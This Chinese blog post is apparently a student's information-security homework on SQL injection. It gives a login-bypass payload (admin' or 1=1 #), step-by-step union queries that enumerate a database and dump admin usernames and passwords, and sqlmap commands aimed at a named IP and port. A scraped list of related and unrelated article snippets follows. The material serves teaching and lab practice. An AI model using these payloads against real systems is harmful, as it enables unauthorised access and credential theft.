sql注入基础知识
信息安全概论课堂作业
SQL注入之万能密码漏洞
第一道题是牵扯到了万能密码漏洞
用户名先输入个’

返回了sql报错语句,猜测存在sql注入漏洞
使用万能密码测试
登陆成功

原理
假设登录框处的判断代码如下:
1 |
SELECT * FROM admin where name='".$_POST['name']."'and password='".$_POST['password']"'; |
在账号框中输入admin'or 1=1 #,密码随便输,sql语句就变成了:
1 |
SELECT * FROM admin where name='admin' or 1=1 #'and password='任意字符'; |
符号’将语句闭合
#号将admin' or 1=1后面的语句注释
剩下有效的sql代码变成了
1 |
SELECT * FROM admin where name='admin' or 1=1; |
这段代码意思就是 ‘admin’ or 1=1 (真 or 真)是一个恒为真的判断
服务器收到了返回真的验证,就绕过了登录
防止方法
1.字符转义
2.字符替换
3.百度如何预防SQL注入
SQL注入之字符型注入
利用手动注入
打开网站看到网址有个id参数

判断注入类型
输入id=1 and 1=1# 页面正常
输入id=1 and 1=2# 页面出现异常
猜测为数字注入
判断字段数
输入id=1 order by 2# 页面正常
输入id=1 order by 3# 页出出现异常
得知有两个字段
判断字段回显位置
输入
1 |
id=1 and 1=2 union select 1,2# |
查看字段位置
查看数据库名
字
输入
1 |
id=6666 union select 1,database()# |
出现数据库名字:maoshe

查看表名
输入
1 |
id=id=6666 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()# |
出现了很多表名

查看字段名
我们需要的是admin表
输入
1 |
id=6666 union select 1,group_concat(column_name) from information_schema.columns where table_name='admin'# |
看到了字段名id、username、password

查看字段里的数据
输入
1 |
id=6666 union select 1,group_concat(id,":",username,":",password) from admin# |
看到了管理员用户名和密码

利用sqlmap工具注入
检查注入点:
1 |
python .\sqlmap.py -u 'http://59.63.200.79:8003/?id=1' --dbs |


爆数据库的信息:
1 |
python .\sqlmap.py -u 'http://59.63.200.79:8003/?id=1' --dbs |

爆当前数据库信息:
1 |
python .\sqlmap.py -u 'http://59.63.200.79:8003/?id=1' --current-db |

指定库名表名列出所有字段
1 |
python .\sqlmap.py -u 'http://59.63.200.79:8003/?id=1' -D maoshe -T admin --column |

指定库名表名字段dump出指定字段
python .\sqlmap.py -u 'http://59.63.200.79:8003/?id=1' -D maoshe -T admin -C username password --dump

内容来自于
http://reb0rn.design/2019/10/13/信息安全概论课堂作业/
sql注入基础知识的更多相关文章
- Sqli-labs之sql注入基础知识
(1)注入的分类 基于从服务器接收到的响应 ▲基于错误的SQL注入 ▲联合查询的类型 ▲堆查询注射 ▲SQL盲注 •基于布尔SQL盲注 •基于时间的SQL盲注 •基于报错的SQL盲注 基于如何处理输 ...
- SQL server基础知识(表操作、数据约束、多表链接查询)
SQL server基础知识 一.基础知识 (1).存储结构:数据库->表->数据 (2).管理数据库 增加:create database 数据库名称 删除:drop database ...
- Sql Server 基础知识
Sql Server 基础知识: http://blog.csdn.net/t6786780/article/details/4525652 Sql Server 语句大全: http://www.c ...
- SQL数据库基础知识-巩固篇<一>
SQL数据库基础知识-巩固篇<一>... =============== 首先展示两款我个人很喜欢的数据库-专用于平时个人SQL技术的练习<特点:体积小,好安装和好卸载,功能完全够用 ...
- Sql注入基础原理介绍
说明:文章所有内容均截选自实验楼教程[Sql注入基础原理介绍]~ 实验原理 Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击, ...
- 通过sqli-labs学习sql注入——基础挑战之less1-3
首先,先看一些基础知识吧!!!!本人只是初学者,记录一下自己的学习过程,有什么错误之处请指出,谢谢!大佬请绕过!!!! url编码:一般的url编码其实就是那个字符的ASCII值得十六进制,再在前面加 ...
- 通过sqli-labs学习sql注入——基础挑战之less1
环境准备: Phpstudy (PHP+Apache+Mysql) Sql-lab 首先了解下基础知识: URL编码: 因为在浏览器中,当我们访问一个网址的时候,浏览器会自动将用户输入的网址进行UR ...
- SQL 注入基础
SQL注入 SQL注入是服务器端未严格校验客户端发送的数据,而导致服务端SQL语句被恶意修改并成功执行的行为. 本质:把用户输入的数据当作代码执行.任何和数据库产生交互的地方便有可能存在注入. SQL ...
- 【SQL】- 基础知识梳理(二) - SQL简介
一.引言 在梳理这些知识之前,说实话,如果有人问我SQL是什么?我可能会回答就是“INSERT,DELETE,UPDATE,SELECT”语句呗,还能是啥. 二.SQL概念 SQL是什么? SQL是S ...
随机推荐
- python3相关
with用法 with A as B: 语句 调用( A返回的类) 的__enter__方法 将该方法返回值赋予B, 执行完with语句块后, 调用类的__exit__方法
- 分析器错误消息: Reference.svcmap:未能加载文件
-------------- 缺少了:System.Web.Razor.dll
- 2020牛客寒假算法基础集训营3 G.牛牛的Link Power II (树状数组维护前缀和)
https://ac.nowcoder.com/acm/contest/3004/G 发现每个“1”对于它本身位置产生的影响贡献为0,对前面的“1”有产生贡献,对后面的"1"也产生 ...
- 154.Ajax处理csrf防御
在普通的form表单中采用post请求提交数据,可以在form表单的method=post的form标签下面,添加一个csrf_token标签{% csrf_token %},或者是直接手动的添加一个 ...
- MySQL语法规范
不区分大小写(规范:关键字大写,表名列名小写) 每条命令用 :结尾 每条命令可以根据需要进行 缩进或换行. 最标准的模板: 关键字 对象 关键字 对象 注释:用于解释说明,编译器会自动忽略 单行注释: ...
- Data Manipulation with dplyr in R
目录 select The filter and arrange verbs arrange filter Filtering and arranging Mutate The count verb ...
- 素问 - IC移仓换月
摘自<小韭的学习圈> Q 股指期货的合约什么时候换月比较合适? 今天是1908股指期货的交割日,我是这么操作的:我在10:30分把IH1908以2827元卖出,然后马上以2805.8元买入 ...
- 【18】 递归 X的N次幂
题目(我没想到这也能出成题目--) 实现函数double Power(double base, int exponent),求base的exponent次方.不得使用库函数,同时不需要考虑大数问题. ...
- Python之旅第二天(第一天补充部分、数据类型、运算逻辑、部分方法的引入、pycharm)
今天其实是有点小忙的,但是干自己不喜欢事情的结果就是,要睡觉了都不知道自己在忙鸡毛,所以还是不继续想了,脑仁疼.回忆一下今天的学习内容,着实有点少,本大侠还没怎么过瘾呢.废话不多说. while补充两 ...
- C#画图超出屏幕的部分无法显示的解决方法
C#画图超出屏幕的部分无法显示,通过AutoScrollMinSize属性及相关方法解决问题. 可以实现 到 的转变. 代码如下: using System.Drawing; using System ...